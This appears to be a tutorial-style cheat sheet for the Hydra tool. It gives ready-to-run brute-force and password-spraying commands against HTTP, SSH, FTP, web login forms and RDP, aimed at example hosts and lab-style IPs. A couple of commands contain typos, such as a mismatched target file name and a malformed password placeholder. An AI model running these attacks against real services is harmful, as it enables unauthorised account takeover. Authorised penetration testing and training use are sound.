HYDRA
INSTALLATION
root@oco:~$ sudo apt update
root@oco:~$ sudo apt search hydra
root@oco:~$ sudo apt install hydraBASIC USAGE
root@oco:~$ hydra -h
hydra [login_options] [password_options] [attack_options] [service_options]
SERVICES
services define the specific protocols or services that Hydra can target. each service is contained in a module. each module is designed to understand a particular protocol's communication patterns and authentication requirements, allowing Hydra to send appropriate login requests and interpret the responses.
BRUTE FORCE: HTTP AUTHENTICATION
root@oco:~$ nano usernames.txt
...
admin
root@oco:~$ nano passwords.txt
...
password
root@oco:~$ hydra -L usernames.txt -P passwords.txt www.example.com http-getBRUTE FORCE: MULTIPLE SSH SERVERS
root@oco:~$ nano sshTargets.txt
...
10.10.10.5
root@oco:~$ hydra -l root -p toor -M targets.txt ssh
* Hydra will execute parallel brute-force attempts on each server, significantly speeding up the processBRUTE FORCE: FTP ON NON-STANDARD PORT
root@oco:~$ nano usernames.txt
...
admin
root@oco:~$ nano passwords.txt
...
password
root@oco:~$ hydra -L usernames.txt -P passwords.txt -s 2121 -V ftp.example.com ftp
* the -s is used to specify a non-standard portBRUTE FORCE: WEB LOGIN FORMS - SUCCESSFUL REDIRECTS
root@oco:~$ nano passwords.txt
...
password
root@oco:~$ hydra -l admin -P passwords.txt www.example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=302"
* the user=^USER^&pass=^PASS^ represents the form parameter
- the specific format can be retrieved via Burp Suite or through the Browser's dev tools
- the S=302 is used to look for a successful login indicated by the HTTP status code 302
- Looking for a successful login indicated by the HTTP status code 302 is
necessary because, in many web applications, successful authentication
does not directly return a 200 OK response. Instead, it often redirects
the user to a different page after login, which is signified by
the 302 Found status code.BRUTE FORCE: WEB LOGIN FORMS - FAILURE ERRORS
hydra -L allowed.userlist -P allowed.userlist.passwd 10.129.1.15 http-post-form "/login.php:username=^USER^&password=^PASS^:F=Warning! Incorrect information."#Invalid username or password
hydra -L top-usernames-shortlist.txt -P 500-worst-passwords.txt 10.129.223.232 -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS&:F=Invalid username or password"BRUTE FORCE: RDP (ADVANCED)
root@oco:~$ hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 192.168.1.100 rdp
* the -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 represents a password consisting of 6 to 8 characters, including lowercase letters, uppercase letters, and numbers
- this generates and test passwords ranging from 6 to 8 characters, using the specified character set.
* Hydra will generate and test all possible password combinations within the specified parameters, attempting to break into the RDP service.PASSWORD SPRAYING
this attack uses the same password against many users before another password is attempted. this method may prevent account lockouts due to too many incorrect login attempts
root@oco:~$ cat > usernames.txt
optimus
albert
andreas
christine
maria
root
CTRL+C
root@oco:~$ hydra -L usernames.txt -p 'funnel123#!#' {target_IP} ssh Last updated